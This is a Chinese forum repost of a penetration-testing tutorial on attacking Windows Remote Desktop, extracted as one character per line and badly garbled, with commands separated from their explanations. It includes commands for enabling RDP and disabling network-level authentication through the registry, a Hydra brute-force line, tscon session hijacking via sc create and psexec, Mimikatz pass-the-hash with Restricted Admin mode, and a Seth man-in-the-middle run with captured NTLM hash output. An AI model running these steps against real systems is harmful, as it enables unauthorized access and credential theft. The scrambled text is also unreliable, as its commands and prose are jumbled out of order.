论坛
BBS
空间测绘
发表
发布文章
提问答疑
搜索
您还未登录
登录后即可体验更多功能
立即登录
我的收藏
提问答疑
我要投稿
渗透测试
[16901] 2021-06-13_内网渗透测试:初探远程桌面的安全问题
文档创建者:
s7ckTeam
浏览次数:
5
最后更新:
2025-01-18
渗透测试
5 人阅读
|
0 人回复
s7ckTeam
s7ckTeam
当前离线
积分
-56
6万
主题
-6万
回帖
-56
积分
管理员
积分
-56
发消息
2021-06-13_内网渗透测试:初探远程桌面的安全问题
内
网
渗
透
测
试
:
初
探
远
程
桌
面
的
安
全
问
题
W
H
O
A
M
I
F
r
e
e
B
u
f
2
0
2
1
-
0
6
-
1
3
前
言
前
言
远
程
桌
面
对
了
解
内
网
渗
透
的
人
来
说
可
能
再
熟
悉
不
过
了
。
在
渗
透
测
试
中
,
拿
下
一
台
主
机
后
有
时
候
会
选
择
开
3
3
8
9
进
远
程
桌
面
查
看
一
下
对
方
主
机
内
有
无
一
些
有
价
值
的
东
西
可
以
利
用
。
但
是
远
程
桌
面
的
利
用
不
仅
如
此
,
本
节
我
们
便
来
初
步
汇
总
一
下
远
程
桌
面
在
内
网
渗
透
中
的
各
种
利
用
姿
势
。
文
中
若
有
不
当
之
处
还
请
各
位
大
佬
多
多
点
评
我
的
博
客
:
h
t
t
p
s
:
/
/
w
h
o
a
m
i
a
n
o
n
y
.
t
o
p
/
R
D
P
协
议
协
议
R
D
P
,
R
e
m
o
t
e
D
e
s
k
t
o
p
P
r
o
t
o
c
o
l
,
远
程
桌
面
协
议
,
该
协
议
是
对
国
际
电
信
联
盟
发
布
的
一
个
国
际
标
准
的
多
通
道
会
议
协
议
T
.
1
2
0
的
一
个
扩
展
。
远
程
桌
面
协
议
让
用
户
(
客
户
端
或
称
“
本
地
电
脑
”
)
连
上
提
供
微
软
终
端
机
服
务
的
电
脑
(
服
务
器
端
或
称
“
远
程
电
脑
”
)
。
大
部
分
的
W
i
n
d
o
w
s
、
L
i
n
u
x
、
F
r
e
e
B
S
D
、
M
a
c
O
S
X
都
有
相
应
的
客
户
端
。
远
程
桌
面
协
议
在
服
务
端
默
认
监
听
T
C
P
3
3
8
9
端
口
的
数
据
。
远
程
桌
面
协
议
为
用
户
提
供
了
通
过
网
络
连
接
远
程
登
录
到
另
一
台
计
算
机
的
图
形
界
面
。
R
D
P
服
务
的
确
定
和
启
动
服
务
的
确
定
和
启
动
R
D
P
服
务
的
确
定
服
务
的
确
定
注
册
表
查
询
注
册
表
查
询
通
过
以
下
命
令
查
询
注
册
表
来
查
看
R
D
P
服
务
是
否
开
启
:
进
程
查
看
进
程
查
看
通
过
以
下
命
令
来
查
看
是
否
有
R
D
P
服
务
的
进
程
:
端
口
扫
描
端
口
扫
描
攻
击
者
可
以
借
助
N
m
a
p
扫
描
来
验
证
端
口
3
3
8
9
是
否
被
打
开
:
R
E
G
Q
U
E
R
Y
"
H
K
E
Y
_
L
O
C
A
L
_
M
A
C
H
I
N
E
S
Y
S
T
E
M
C
u
r
r
e
n
t
C
o
n
t
r
o
l
S
e
t
C
o
n
t
r
o
l
T
e
r
m
i
n
a
l
S
e
r
v
e
r
"
/
v
f
D
e
n
y
T
S
C
o
n
n
e
c
t
i
o
n
s
#
查
看
R
D
P
服
务
是
否
开
启
:
1
关
闭
,
0
开
启
R
E
G
Q
U
E
R
Y
"
H
K
E
Y
_
L
O
C
A
L
_
M
A
C
H
I
N
E
S
Y
S
T
E
M
C
u
r
r
e
n
t
C
o
n
t
r
o
l
S
e
t
C
o
n
t
r
o
l
T
e
r
m
i
n
a
l
S
e
r
v
e
r
W
i
n
S
t
a
t
i
o
n
s
R
D
P
-
T
c
p
"
/
v
P
o
r
t
N
u
m
b
e
r
#
查
看
R
D
P
服
务
的
端
口
R
E
G
Q
U
E
R
Y
"
H
K
E
Y
_
L
O
C
A
L
_
M
A
C
H
I
N
E
S
Y
S
T
E
M
C
u
r
r
e
n
t
C
o
n
t
r
o
l
S
e
t
C
o
n
t
r
o
l
T
e
r
m
i
n
a
l
S
e
r
v
e
r
"
/
v
f
D
e
n
y
T
S
C
o
n
n
e
c
t
i
o
n
s
#
查
看
R
D
P
服
务
是
否
开
启
:
1
关
闭
,
0
开
启
R
E
G
Q
U
E
R
Y
"
H
K
E
Y
_
L
O
C
A
L
_
M
A
C
H
I
N
E
S
Y
S
T
E
M
C
u
r
r
e
n
t
C
o
n
t
r
o
l
S
e
t
C
o
n
t
r
o
l
T
e
r
m
i
n
a
l
S
e
r
v
e
r
W
i
n
S
t
a
t
i
o
n
s
R
D
P
-
T
c
p
"
/
v
P
o
r
t
N
u
m
b
e
r
#
查
看
R
D
P
服
务
的
端
口
n
m
a
p
-
s
V
-
s
C
-
p
3
3
8
9
1
9
2
.
1
6
8
.
9
3
.
3
0
R
D
P
服
务
的
启
动
服
务
的
启
动
如
果
发
现
3
3
8
9
并
没
有
开
启
,
我
们
使
用
以
下
方
式
开
启
它
。
修
改
注
册
表
启
动
修
改
注
册
表
启
动
先
通
过
修
改
注
册
表
来
设
置
一
下
允
许
远
程
桌
面
连
接
:
然
后
可
以
再
配
置
一
下
防
火
墙
,
设
置
为
允
许
远
程
桌
面
连
接
,
命
令
:
通
过
通
过
M
e
t
a
s
p
l
o
i
t
模
块
启
动
模
块
启
动
拿
到
目
标
主
机
的
m
e
t
e
r
p
r
e
t
e
r
后
,
如
果
我
们
想
登
陆
目
标
主
机
的
远
程
桌
面
,
我
们
可
以
使
用
p
o
s
t
/
w
i
n
d
o
w
s
/
m
a
n
a
g
e
/
e
n
a
b
l
e
_
r
d
p
模
块
对
目
标
主
机
快
速
完
成
上
述
配
置
:
R
D
P
服
务
的
连
接
服
务
的
连
接
开
启
目
标
主
机
的
远
程
桌
面
后
,
我
们
便
可
以
对
目
标
主
机
进
行
连
接
了
:
L
i
n
u
x
系
统
上
的
可
以
使
用
系
统
上
的
可
以
使
用
r
d
e
s
k
t
o
p
:
:
W
i
n
d
o
w
s
系
统
上
可
以
使
用
系
统
上
可
以
使
用
m
s
t
s
c
.
e
x
e
特
别
要
注
意
一
下
,
有
时
候
,
仅
开
启
了
远
程
桌
面
还
不
行
,
在
连
接
时
可
能
出
现
以
下
报
错
:
这
就
需
要
关
闭
鉴
权
模
式
,
我
们
采
用
如
下
命
令
,
这
里
0
代
表
关
闭
,
1
代
表
开
启
:
即
取
消
“
仅
允
许
运
行
使
用
网
络
界
别
身
份
验
证
的
远
程
桌
面
的
计
算
机
连
接
”
这
一
安
全
设
置
。
此
时
就
可
以
正
常
连
接
了
:
R
E
G
A
D
D
H
K
L
M
S
Y
S
T
E
M
C
u
r
r
e
n
t
C
o
n
t
r
o
l
S
e
t
C
o
n
t
r
o
l
T
e
r
m
i
n
a
l
"
"
S
e
r
v
e
r
/
v
f
D
e
n
y
T
S
C
o
n
n
e
c
t
i
o
n
s
/
t
R
E
G
_
D
W
O
R
D
/
d
0
0
0
0
0
0
0
0
/
f
n
e
t
s
h
a
d
v
f
i
r
e
w
a
l
l
f
i
r
e
w
a
l
l
a
d
d
r
u
l
e
n
a
m
e
=
"
R
e
m
o
t
e
D
e
s
k
t
o
p
"
p
r
o
t
o
c
o
l
=
T
C
P
d
i
r
=
i
n
l
o
c
a
l
p
o
r
t
=
3
3
8
9
a
c
t
i
o
n
=
a
l
l
o
w
u
s
e
p
o
s
t
/
w
i
n
d
o
w
s
/
m
a
n
a
g
e
/
e
n
a
b
l
e
_
r
d
p
s
e
t
s
e
s
s
i
o
n
1
e
x
p
l
o
i
t
r
e
d
e
s
k
t
o
p
1
9
2
.
1
6
8
.
9
3
.
3
0
#
r
e
d
e
s
k
t
o
p
I
P
R
E
G
A
D
D
"
H
K
L
M
S
Y
S
T
E
M
C
u
r
r
e
n
t
C
o
n
t
r
o
l
S
e
t
C
o
n
t
r
o
l
T
e
r
m
i
n
a
l
S
e
r
v
e
r
W
i
n
S
t
a
t
i
o
n
s
R
D
P
-
T
c
p
"
/
v
U
s
e
r
A
u
t
h
e
n
t
i
c
a
t
i
o
n
/
t
R
E
G
_
D
W
O
R
D
/
d
0
对
对
R
D
P
口
令
进
行
暴
力
破
解
口
令
进
行
暴
力
破
解
在
实
战
中
,
攻
击
者
可
以
借
助
N
m
a
p
来
扫
描
目
标
主
机
3
3
8
9
端
口
是
否
开
启
,
如
果
目
标
主
机
开
启
了
3
3
8
9
端
口
,
那
我
们
便
可
以
对
目
标
主
机
的
远
程
桌
面
登
录
口
令
进
行
暴
力
猜
解
。
下
面
我
们
通
过
H
y
d
r
a
工
具
来
展
示
对
R
D
P
进
行
爆
破
:
如
上
图
所
示
,
成
功
获
取
到
目
标
主
机
a
d
m
i
n
i
s
t
r
a
t
o
r
的
登
录
口
令
,
使
用
此
凭
据
攻
击
者
可
以
登
录
远
程
桌
面
服
务
:
R
D
P
劫
持
实
现
未
授
权
登
录
劫
持
实
现
未
授
权
登
录
对
于
开
启
远
程
桌
面
服
务
的
W
i
n
d
o
w
s
系
统
,
当
有
多
个
用
户
登
录
该
系
统
时
,
会
产
生
多
个
会
话
,
如
下
图
:
H
y
d
r
a
-
v
-
f
-
l
w
h
o
a
m
i
a
n
o
n
y
a
d
m
i
n
i
s
t
r
a
t
o
r
-
P
/
r
o
o
t
/
w
o
r
d
l
i
s
t
s
.
t
x
t
r
d
p
:
/
/
1
9
2
.
1
6
8
.
9
3
.
3
0
其
中
,
管
理
员
用
户
A
d
m
i
n
i
s
t
r
a
t
o
r
为
本
地
登
录
,
用
户
b
u
n
n
y
为
通
过
远
程
桌
面
服
务
(
R
D
P
)
连
接
3
3
8
9
端
口
的
远
程
桌
面
登
录
。
接
下
来
,
如
果
用
户
A
d
m
i
n
i
s
t
r
a
t
o
r
想
要
切
换
至
用
户
b
u
n
n
y
的
远
程
桌
面
,
可
通
过
右
键
—
>
连
接
(
C
o
n
n
e
c
t
)
进
行
连
接
,
接
着
输
入
密
码
即
可
切
换
到
b
u
n
n
y
用
户
:
点
击
确
定
后
,
如
下
图
所
示
,
成
功
切
换
到
了
b
u
n
n
y
用
户
的
远
程
桌
面
:
而
且
,
在
W
i
n
d
o
w
s
中
有
一
个
t
s
c
o
n
命
令
,
是
命
令
行
下
使
用
的
工
具
,
也
可
以
实
现
与
上
述
相
同
的
功
能
。
首
先
执
行
如
下
命
令
获
取
用
户
对
应
的
会
话
I
D
:
q
u
e
r
y
u
s
e
r
可
以
看
到
用
户
b
u
n
n
y
对
应
的
会
话
I
D
为
2
,
然
后
通
过
执
行
t
s
c
o
n
命
令
即
可
成
功
切
换
至
用
户
b
u
n
n
y
的
远
程
桌
面
,
命
令
如
下
:
/
P
A
S
S
W
O
R
D
:
b
u
n
n
y
用
户
的
密
码
可
见
,
t
s
c
o
n
命
令
提
供
了
一
个
切
换
用
户
会
话
的
功
能
,
并
且
,
在
正
常
情
况
下
,
切
换
会
话
时
需
要
提
供
目
标
用
户
的
登
录
密
码
。
但
这
并
不
能
完
全
确
保
会
话
安
全
,
攻
击
者
通
过
特
殊
的
利
用
方
法
完
全
能
够
绕
过
验
证
,
不
输
入
密
码
即
可
切
换
到
目
标
会
话
,
从
而
实
现
目
标
用
户
的
未
授
权
登
录
。
而
这
里
所
讲
的
特
殊
的
利
用
方
法
便
是
在
S
Y
S
T
E
M
权
限
下
直
接
执
行
t
s
c
o
n
会
话
切
换
命
令
:
此
时
攻
击
者
可
以
在
不
提
供
其
他
用
户
登
录
凭
据
的
情
况
下
自
由
切
换
会
话
桌
面
,
实
现
劫
持
其
他
用
户
的
R
D
P
会
话
。
R
D
P
会
话
劫
持
在
特
定
情
况
下
可
以
大
显
身
手
,
比
如
对
于
较
新
的
W
i
n
d
o
w
s
系
统
,
默
认
情
况
下
是
无
法
通
过
M
i
m
i
k
a
t
z
导
出
用
户
明
文
口
令
的
,
此
时
我
们
通
过
常
规
方
法
无
法
切
换
至
另
一
用
户
的
桌
面
,
那
么
我
们
便
可
以
借
助
上
文
提
到
的
方
法
,
先
提
权
至
S
Y
S
T
E
M
权
限
,
再
劫
持
目
标
用
户
的
R
D
P
并
切
换
过
去
。
特
别
注
意
的
是
,
即
使
远
程
连
接
的
用
户
关
闭
了
远
程
连
接
窗
口
,
也
不
会
劫
持
该
回
话
,
只
是
在
后
台
显
示
“
已
断
开
连
接
”
(
D
i
s
c
o
n
n
e
c
t
e
d
)
:
此
时
,
仍
能
在
S
Y
S
T
E
M
权
限
下
通
过
实
现
未
授
权
连
接
。
高
权
限
用
户
劫
持
低
权
限
用
户
的
高
权
限
用
户
劫
持
低
权
限
用
户
的
R
D
P
高
权
限
用
户
劫
持
低
权
限
用
户
的
R
D
P
会
话
利
用
起
来
比
较
简
单
,
由
于
具
有
管
理
员
权
限
,
可
以
直
接
通
过
创
建
服
务
等
方
式
获
取
S
Y
S
T
E
M
权
限
。
创
建
劫
持
用
户
会
话
的
服
务
:
t
s
c
o
n
2
/
P
A
S
S
W
O
R
D
:
B
u
n
n
y
2
0
2
1
t
s
c
o
n
I
D
t
s
c
o
n
s
c
c
r
e
a
t
e
r
d
p
b
i
n
p
a
t
h
=
"
c
m
d
.
e
x
e
/
k
t
s
c
o
n
2
/
d
e
s
t
:
c
o
n
s
o
l
e
"
s
c
s
t
a
r
t
r
d
p
执
行
后
,
我
们
创
建
的
劫
持
会
话
的
服
务
将
会
启
动
,
由
于
W
i
n
d
o
w
s
是
以
S
Y
S
T
E
M
权
限
运
行
服
务
的
,
所
以
我
们
命
令
也
会
以
S
Y
S
T
E
M
权
限
运
行
,
此
时
便
可
以
在
不
提
供
目
标
用
户
密
码
的
情
况
下
成
功
劫
持
目
标
用
户
的
会
话
:
其
实
也
可
以
使
用
P
s
e
x
e
c
来
获
得
一
个
S
Y
S
T
E
M
权
限
的
c
m
d
(
P
s
e
x
e
c
获
得
的
s
h
e
l
l
是
S
Y
S
T
E
M
权
限
的
)
,
然
后
再
这
个
S
Y
S
T
E
M
权
限
的
c
m
d
中
直
接
执
行
劫
持
命
令
:
低
权
限
用
户
劫
持
高
权
限
用
户
的
低
权
限
用
户
劫
持
高
权
限
用
户
的
R
D
P
低
权
限
用
户
劫
持
高
权
限
用
户
的
R
D
P
会
话
利
用
起
来
没
有
前
者
那
么
简
单
,
因
为
权
限
太
低
,
所
以
无
法
执
行
创
建
服
务
,
执
行
P
s
e
x
e
c
等
高
权
限
的
命
令
。
所
以
如
果
低
权
限
用
户
想
要
劫
持
高
权
限
用
户
的
R
D
P
的
话
需
要
想
办
法
提
权
,
即
将
自
己
的
权
限
提
升
至
S
Y
S
T
E
M
。
实
验
环
境
如
下
:
假
设
有
这
么
一
种
情
况
,
有
一
台
W
i
n
d
o
w
s
S
e
r
v
e
r
2
0
1
2
系
统
的
服
务
器
,
其
本
地
登
录
着
一
个
普
通
域
用
户
b
u
n
n
y
:
s
c
s
t
a
r
t
r
d
p
t
s
c
o
n
2
t
s
c
o
n
2
p
s
e
x
e
c
-
s
-
i
c
m
d
#
获
得
一
个
S
Y
S
T
E
M
权
限
的
c
m
d
q
u
s
e
r
u
s
e
r
#
在
新
获
得
的
S
Y
S
T
E
M
权
限
的
c
m
d
中
执
行
劫
持
命
令
t
s
c
o
n
2
/
d
e
s
t
:
c
o
n
s
o
l
e
我
们
通
过
某
种
方
式
获
得
了
这
个
b
u
n
n
y
用
户
的
登
录
密
码
,
并
使
用
这
个
b
u
n
n
y
用
户
成
功
进
行
远
程
登
录
:
此
时
,
登
录
后
查
看
任
务
管
理
器
发
现
后
台
还
存
在
管
理
员
用
户
A
d
m
i
n
i
s
t
r
a
t
o
r
的
会
话
:
并
且
使
用
命
令
查
看
其
会
话
I
D
为
1
。
接
下
来
我
们
尝
试
劫
持
这
个
管
理
员
用
户
的
远
程
会
话
。
首
先
使
目
标
主
机
上
线
一
个
b
u
n
n
y
用
户
权
限
的
M
S
F
,
然
后
通
过
各
种
系
统
漏
洞
获
得
了
目
标
机
的
S
y
s
t
e
m
权
限
:
然
后
进
入
s
h
e
l
l
中
执
行
t
s
c
o
n
命
令
进
行
劫
持
即
可
:
q
u
e
r
y
u
s
e
r
如
上
图
所
示
,
成
功
劫
持
并
切
换
到
了
A
d
m
i
n
i
s
t
r
a
t
o
r
用
户
的
远
程
桌
面
。
利
用
哈
希
传
递
登
录
利
用
哈
希
传
递
登
录
R
D
P
远
程
桌
面
远
程
桌
面
W
i
n
d
o
w
s
S
e
r
v
e
r
2
0
1
2
R
2
采
用
了
新
版
的
R
D
P
远
程
桌
面
协
议
,
在
这
个
新
版
协
议
中
有
一
个
”
受
限
管
理
员
”
(
R
e
s
t
r
i
c
t
e
d
A
d
m
i
n
)
的
特
性
。
相
信
渗
透
测
试
人
员
和
系
统
管
理
员
都
会
对
这
个
特
性
有
足
够
的
兴
趣
,
因
为
通
过
这
个
特
性
,
我
们
可
以
实
现
哈
希
传
递
攻
击
并
成
功
登
录
远
程
桌
面
。
在
抓
取
到
的
H
a
s
h
无
法
破
解
的
情
况
下
,
如
果
目
标
主
机
开
启
了
“
R
e
s
t
r
i
c
t
e
d
A
d
m
i
n
M
o
d
e
”
也
行
,
那
么
我
们
便
可
以
使
用
H
a
s
h
来
直
接
实
现
R
D
P
远
程
登
录
。
R
e
s
t
r
i
c
t
e
d
A
d
m
i
n
M
o
d
e
在
W
i
n
d
o
w
s
8
.
1
和
W
i
n
d
o
w
s
S
e
r
v
e
r
2
0
1
2
R
2
上
默
认
开
启
。
我
们
在
渗
透
过
程
中
可
以
通
过
修
改
注
册
表
的
方
式
开
启
目
标
主
机
的
R
e
s
t
r
i
c
t
e
d
A
d
m
i
n
M
o
d
e
,
值
为
0
代
表
开
启
,
值
为
1
代
表
关
闭
:
如
上
图
所
示
,
成
功
在
目
标
主
机
开
启
了
R
e
s
t
r
i
c
t
e
d
A
d
m
i
n
M
o
d
e
。
然
后
再
攻
击
机
上
使
用
M
i
m
i
k
a
t
z
进
行
哈
希
传
递
,
大
致
原
理
就
是
哈
希
传
递
成
功
后
执
行
来
打
开
:
报
错
了
,
说
C
r
e
d
S
S
P
加
密
数
据
库
错
误
,
大
概
是
因
为
W
i
n
d
o
w
s
1
0
家
庭
版
的
原
因
吧
。
然
后
俺
有
换
了
另
一
个
版
本
的
W
i
n
d
o
w
s
成
功
了
:
R
E
G
A
D
D
"
H
K
L
M
S
y
s
t
e
m
C
u
r
r
e
n
t
C
o
n
t
r
o
l
S
e
t
C
o
n
t
r
o
l
L
s
a
"
/
v
D
i
s
a
b
l
e
R
e
s
t
r
i
c
t
e
d
A
d
m
i
n
/
t
R
E
G
_
D
W
O
R
D
/
d
0
0
0
0
0
0
0
0
/
f
R
E
G
q
u
e
r
y
"
H
K
L
M
S
y
s
t
e
m
C
u
r
r
e
n
t
C
o
n
t
r
o
l
S
e
t
C
o
n
t
r
o
l
L
s
a
"
|
f
i
n
d
s
t
r
"
D
i
s
a
b
l
e
R
e
s
t
r
i
c
t
e
d
A
d
m
i
n
"
m
s
t
s
c
.
e
x
e
/
r
e
s
t
r
i
c
t
e
d
a
d
m
i
n
p
r
i
v
i
l
e
g
e
:
:
d
e
b
u
g
s
e
k
u
r
l
s
a
:
:
p
t
h
/
u
s
e
r
:
a
d
m
i
n
i
s
t
r
a
t
o
r
/
d
o
m
a
i
n
:
w
h
o
a
m
i
a
n
o
n
y
.
o
r
g
/
n
t
l
m
:
a
b
8
9
b
1
2
9
5
e
6
9
d
3
5
3
d
d
7
6
1
4
c
7
a
3
a
8
0
c
e
c
"
/
r
u
n
:
m
s
t
s
c
.
e
x
e
/
r
e
s
t
r
i
c
t
e
d
a
d
m
i
n
"
注
意
,
这
里
的
受
限
管
理
员
模
式
顾
名
思
义
只
对
管
理
员
组
有
效
。
所
以
如
果
你
获
取
到
的
用
户
属
于
远
程
桌
面
用
户
组
,
那
么
是
无
法
通
过
H
a
s
h
登
录
的
。
R
D
P
远
程
桌
面
中
间
人
攻
击
远
程
桌
面
中
间
人
攻
击
中
间
人
攻
击
通
常
会
导
致
凭
据
捕
获
。
同
样
的
,
在
对
R
D
P
会
话
进
行
中
间
人
攻
击
,
攻
击
者
可
以
获
得
一
个
登
录
用
户
的
明
文
密
码
,
用
于
后
期
的
横
向
移
动
。
当
R
D
P
爆
破
走
不
通
时
,
我
们
不
妨
尝
试
一
下
中
间
人
。
S
e
t
h
是
一
个
用
P
y
t
h
o
n
和
B
a
s
h
编
写
的
R
D
P
中
间
人
攻
击
自
动
化
工
具
,
通
过
尝
试
降
级
连
接
用
以
提
取
明
文
凭
证
来
实
现
M
i
t
M
R
D
P
连
接
,
而
不
管
网
络
级
别
的
身
份
验
证
(
N
L
A
)
是
否
启
用
。
项
目
地
址
:
h
t
t
p
s
:
/
/
g
i
t
h
u
b
.
c
o
m
/
S
y
S
S
-
R
e
s
e
a
r
c
h
/
S
e
t
h
使
用
该
工
具
所
要
求
的
环
境
:
P
y
t
h
o
n
3
T
c
p
d
u
m
p
A
r
p
s
p
o
o
f
O
p
e
n
s
s
l
运
行
界
面
如
下
:
使
用
方
法
如
下
:
I
N
T
E
R
F
A
C
E
:
网
卡
A
T
T
A
C
K
E
R
I
P
:
中
间
人
I
P
V
I
C
T
I
M
I
P
:
连
接
者
I
P
G
A
T
E
W
A
Y
I
P
|
H
O
S
T
I
P
:
被
连
接
的
远
程
主
机
I
P
C
O
M
M
A
N
D
:
启
动
时
执
行
的
命
令
执
行
以
下
命
令
启
动
s
e
t
h
监
听
:
然
后
当
P
C
上
的
用
户
远
程
登
录
D
C
时
便
会
抓
取
到
登
录
用
户
的
明
文
密
码
。
不
仅
如
此
,
还
可
以
对
用
户
键
盘
的
操
作
进
行
记
录
,
甚
至
使
用
在
目
标
主
机
上
执
行
命
令
。
详
情
请
看
:
h
t
t
p
s
:
/
/
w
w
w
.
f
r
e
e
b
u
f
.
c
o
m
/
s
e
c
t
o
o
l
/
1
7
8
1
4
6
.
h
t
m
l
攻
击
成
功
后
类
似
如
下
:
.
/
s
e
t
h
.
s
h
<
I
N
T
E
R
F
A
C
E
>
<
A
T
T
A
C
K
E
R
_
I
P
>
<
V
I
C
T
I
M
_
I
P
>
<
G
A
T
E
W
A
Y
_
I
P
|
H
O
S
T
_
I
P
>
[
<
C
O
M
M
A
N
D
>
]
.
/
s
e
t
h
.
s
h
e
t
h
0
1
9
2
.
1
6
8
.
9
3
.
1
2
8
1
9
2
.
1
6
8
.
9
3
.
2
0
1
9
2
.
1
6
8
.
9
3
.
3
0
<
C
O
M
M
A
N
D
>
#
.
/
s
e
t
h
.
s
h
e
t
h
0
1
9
2
.
1
6
8
.
9
3
.
1
2
8
1
9
2
.
1
6
8
.
9
3
.
2
0
1
9
2
.
1
6
8
.
9
3
.
3
0
█
█
█
█
█
█
█
╗
█
█
█
█
█
█
█
╗
█
█
█
█
█
█
█
█
╗
█
█
╗
█
█
╗
█
█
╔
═
═
═
═
╝
█
█
╔
═
═
═
═
╝
╚
═
═
█
█
╔
═
═
╝
█
█
║
█
█
║
b
y
A
d
r
i
a
n
V
o
l
l
m
e
r
█
█
█
█
█
█
█
╗
█
█
█
█
█
╗
█
█
║
█
█
█
█
█
█
█
║
s
e
t
h
@
v
o
l
l
m
e
r
.
s
y
s
s
.
d
e
╚
═
═
═
═
█
█
║
█
█
╔
═
═
╝
█
█
║
█
█
╔
═
═
█
█
║
S
y
S
S
G
m
b
H
,
2
0
1
7
获
取
获
取
R
D
P
远
程
桌
面
连
接
记
录
远
程
桌
面
连
接
记
录
在
渗
透
测
试
中
,
远
程
桌
面
连
接
的
历
史
记
录
不
可
忽
视
,
根
据
历
史
记
录
往
往
能
定
位
出
关
键
的
服
务
器
。
接
下
来
我
们
就
介
绍
一
下
如
何
导
出
R
D
P
连
接
的
历
史
记
录
。
获
取
R
D
P
远
程
桌
面
连
接
记
录
可
以
通
过
枚
举
注
册
表
完
成
,
但
是
如
果
想
要
获
得
所
有
用
户
的
历
史
记
录
,
需
要
逐
个
获
得
用
户
的
N
T
U
S
E
R
.
D
A
T
文
件
,
通
过
注
册
表
加
载
配
置
单
元
,
导
入
用
户
配
置
信
息
,
再
进
行
枚
举
才
能
够
实
现
。
导
出
当
前
用
户
的
历
史
记
录
导
出
当
前
用
户
的
历
史
记
录
可
以
通
过
枚
举
下
面
的
注
册
表
键
值
查
看
当
前
用
户
的
历
史
记
录
:
如
下
图
所
示
,
每
个
注
册
表
项
保
存
连
接
的
服
务
器
地
址
,
其
中
的
键
值
对
应
登
录
用
户
名
:
看
也
可
以
通
过
P
o
w
e
r
S
h
e
l
l
命
令
行
来
实
现
,
首
先
通
过
以
下
命
令
枚
举
指
定
注
册
表
项
下
所
有
的
的
子
项
,
即
当
前
用
户
所
连
接
过
的
所
有
的
主
机
名
:
╚
═
═
═
═
█
█
║
█
█
╔
═
═
╝
█
█
║
█
█
╔
═
═
█
█
║
S
y
S
S
G
m
b
H
,
2
0
1
7
█
█
█
█
█
█
█
║
█
█
█
█
█
█
█
╗
█
█
║
█
█
║
█
█
║
h
t
t
p
s
:
/
/
w
w
w
.
s
y
s
s
.
d
e
╚
═
═
═
═
═
═
╝
╚
═
═
═
═
═
═
╝
╚
═
╝
╚
═
╝
╚
═
╝
[
*
]
S
p
o
o
f
i
n
G
a
r
p
r
e
p
l
i
e
s
.
.
.
[
*
]
T
u
r
n
i
n
G
o
n
I
P
f
o
r
w
a
r
d
i
n
G
.
.
.
[
*
]
S
e
t
i
p
t
a
b
l
e
s
r
u
l
e
s
f
o
r
S
Y
N
p
a
c
k
e
t
s
.
.
.
[
*
]
W
a
i
t
i
n
G
f
o
r
a
S
Y
N
p
a
c
k
e
t
t
o
t
h
e
o
r
i
G
i
n
a
l
d
e
s
t
i
n
a
t
i
o
n
.
.
.
[
+
]
G
o
t
i
t
!
O
r
i
G
i
n
a
l
d
e
s
t
i
n
a
t
i
o
n
i
s
1
9
2
.
1
6
8
.
9
3
.
3
0
[
*
]
C
l
o
n
e
t
h
e
x
5
0
9
c
e
r
t
i
f
i
c
a
t
e
o
f
t
h
e
o
r
i
G
i
n
a
l
d
e
s
t
i
n
a
t
i
o
n
.
.
.
[
*
]
A
d
j
u
s
t
t
h
e
i
p
t
a
b
l
e
s
r
u
l
e
f
o
r
a
l
l
p
a
c
k
e
t
s
.
.
.
[
*
]
R
u
n
R
D
P
p
r
o
x
y
.
.
.
L
i
s
t
e
n
i
n
G
f
o
r
n
e
w
c
o
n
n
e
c
t
i
o
n
C
o
n
n
e
c
t
i
o
n
r
e
c
e
i
v
e
d
f
r
o
m
1
9
2
.
1
6
8
.
9
3
.
2
0
:
5
0
4
3
1
D
o
w
n
G
r
a
d
i
n
G
a
u
t
h
e
n
t
i
c
a
t
i
o
n
o
p
t
i
o
n
s
f
r
o
m
1
1
t
o
3
E
n
a
b
l
e
S
S
L
a
l
i
c
e
:
:
a
v
o
l
l
m
e
r
-
s
y
s
s
:
1
f
2
0
6
4
5
7
4
9
b
0
d
f
d
5
:
b
0
d
3
d
5
f
1
6
4
2
c
0
5
7
6
4
c
a
2
8
4
5
0
f
8
9
d
3
8
d
b
:
0
1
0
1
0
0
0
0
0
0
0
0
0
0
0
0
b
2
7
2
0
f
4
8
f
5
d
e
d
2
0
1
2
6
9
2
f
c
d
b
f
5
c
7
9
a
6
9
0
0
0
0
0
0
0
0
0
2
0
0
1
e
0
0
4
4
0
0
4
5
0
0
5
3
0
0
4
b
0
0
5
4
0
0
4
f
0
0
5
0
0
0
2
d
0
0
5
6
0
0
4
e
0
0
5
6
0
0
4
d
0
0
3
5
0
0
4
f
0
0
4
e
0
0
0
1
0
0
1
e
0
0
4
4
0
0
4
5
0
0
5
3
0
0
4
b
0
0
5
4
0
0
4
f
0
0
5
0
0
0
2
d
0
0
5
6
0
0
4
e
0
0
5
6
0
0
4
d
0
0
3
5
0
0
4
f
0
0
4
e
0
0
0
4
0
0
1
e
0
0
4
4
0
0
4
5
0
0
5
3
0
0
4
b
0
0
5
4
0
0
4
f
0
0
5
0
0
0
2
d
0
0
5
6
0
0
4
e
0
0
5
6
0
0
4
d
0
0
3
5
0
0
4
f
0
0
4
e
0
0
0
3
0
0
1
e
0
0
4
4
0
0
4
5
0
0
5
3
0
0
4
b
0
0
5
4
0
0
4
f
0
0
5
0
0
0
2
d
0
0
5
6
0
0
4
e
0
0
5
6
0
0
4
d
0
0
3
5
0
0
4
f
0
0
4
e
0
0
0
7
0
0
0
8
0
0
b
2
7
2
0
f
4
8
f
5
d
e
d
2
0
1
0
6
0
0
0
4
0
0
0
2
0
0
0
0
0
0
0
8
0
0
3
0
0
0
3
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
2
0
0
0
0
0
4
1
3
a
2
7
2
1
a
0
d
9
5
5
c
5
1
a
5
2
d
6
4
7
2
8
9
6
2
1
7
0
6
d
6
9
8
0
b
f
8
3
a
5
4
7
4
c
1
0
d
3
a
c
0
2
a
c
b
0
1
0
5
c
0
a
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
9
0
0
2
c
0
0
5
4
0
0
4
5
0
0
5
2
0
0
4
d
0
0
5
3
0
0
5
2
0
0
5
6
0
0
2
f
0
0
3
1
0
0
3
9
0
0
3
2
0
0
2
e
0
0
3
1
0
0
3
6
0
0
3
8
0
0
2
e
0
0
3
5
0
0
3
7
0
0
2
e
0
0
3
1
0
0
3
0
0
0
3
2
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
T
a
m
p
e
r
w
i
t
h
N
T
L
M
r
e
s
p
o
n
s
e
T
L
S
a
l
e
r
t
a
c
c
e
s
s
d
e
n
i
e
d
